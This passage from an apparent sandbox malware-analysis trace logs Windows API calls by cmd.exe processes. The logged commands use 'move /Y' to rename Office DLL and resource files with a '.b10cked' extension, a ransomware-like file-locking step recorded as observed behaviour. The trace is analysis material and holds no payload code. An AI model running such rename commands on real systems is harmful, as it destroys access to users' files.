lpVolumeSerialNumber=0x18f1f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.887] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0176.887] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~2.trx")) returned 0x2020 [0176.887] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.887] SetErrorMode (uMode=0x0) returned 0x0 [0176.887] SetErrorMode (uMode=0x1) returned 0x0 [0176.887] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb84, lpFilePart=0x18eb6c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", lpFilePart=0x18eb6c*="XLINTL~2.TRX") returned 0x3c [0176.887] SetErrorMode (uMode=0x0) returned 0x1 [0176.887] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0176.888] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~2.trx")) returned 0x2020 [0176.888] SetErrorMode (uMode=0x0) returned 0x0 [0176.888] SetErrorMode (uMode=0x1) returned 0x0 [0176.888] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18f000, lpFilePart=0x18ed98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", lpFilePart=0x18ed98*="XLINTL~2.TRX") returned 0x3c [0176.888] SetErrorMode (uMode=0x0) returned 0x1 [0176.888] SetErrorMode (uMode=0x0) returned 0x0 [0176.888] SetErrorMode (uMode=0x1) returned 0x0 [0176.888] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f208, lpFilePart=0x18ed98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x18ed98*="XLINTL32.REST.trx_dll.b10cked") returned 0x4d [0176.888] SetErrorMode (uMode=0x0) returned 0x1 [0176.888] SetLastError (dwErrCode=0x0) [0176.888] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0176.888] GetLastError () returned 0x2 [0176.888] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e714, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e714) returned 0x312138 [0176.888] FindNextFileW (in: hFindFile=0x312138, lpFindFileData=0x18e714 | out: lpFindFileData=0x18e714) returned 0 [0176.889] GetLastError () returned 0x12 [0176.889] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0176.890] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x311cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311cc8) returned 0x312138 [0176.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0176.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0176.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll")) returned 0x2020 [0176.890] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0176.891] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0176.891] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e960 | out: _Buffer=" 1") returned 9 [0176.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.891] GetFileType (hFile=0x7) returned 0x2 [0176.976] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0176.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8ec | out: lpMode=0x18e8ec) returned 1 [0176.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.976] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e920 | out: lpConsoleScreenBufferInfo=0x18e920) returned 1 [0176.977] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0176.977] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e960 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0176.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e944, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e944*=0x1a) returned 1 [0176.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.978] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.978] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.978] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.978] SetConsoleInputExeNameW () returned 0x1 [0176.978] GetConsoleOutputCP () returned 0x1b5 [0176.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.978] exit (_Code=0) Process: id = "316" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24400 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24401 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24402 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24403 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24404 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24405 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24406 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24407 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24408 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24409 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24482 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24483 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24484 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 24485 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 24486 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24487 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24488 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24489 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24490 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24491 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24492 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24493 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24494 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24495 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 24496 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24497 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24498 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24499 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24500 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24501 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24502 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24503 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 24504 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 425 os_tid = 0xbbc [0176.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fce4 | out: lpSystemTimeAsFileTime=0x24fce4*(dwLowDateTime=0x9f421da0, dwHighDateTime=0x1d440a9)) [0176.951] GetCurrentProcessId () returned 0xa40 [0176.951] GetCurrentThreadId () returned 0xbbc [0176.951] GetTickCount () returned 0x334f4 [0176.951] QueryPerformanceCounter (in: lpPerformanceCount=0x24fcdc | out: lpPerformanceCount=0x24fcdc*=23374053716) returned 1 [0176.952] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.952] __set_app_type (_Type=0x1) [0176.952] __p__fmode () returned 0x76b331f4 [0176.952] __p__commode () returned 0x76b331fc [0176.952] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.952] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.953] GetCurrentThreadId () returned 0xbbc [0176.953] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbbc) returned 0x38 [0176.953] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.953] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.953] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.953] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fc74 | out: phkResult=0x24fc74*=0x0) returned 0x2 [0176.953] VirtualQuery (in: lpAddress=0x24fcab, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0176.953] GetConsoleOutputCP () returned 0x1b5 [0176.953] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.954] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.954] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.954] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.955] GetEnvironmentStringsW () returned 0x390210* [0176.955] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.955] GetEnvironmentStringsW () returned 0x390210* [0176.955] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ebe4 | out: phkResult=0x24ebe4*=0x40) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0xa0, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x0, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegCloseKey (hKey=0x40) returned 0x0 [0176.955] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ebe4 | out: phkResult=0x24ebe4*=0x40) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x0, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegCloseKey (hKey=0x40) returned 0x0 [0176.956] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.956] srand (_Seed=0x5b88638c) [0176.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" [0176.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" 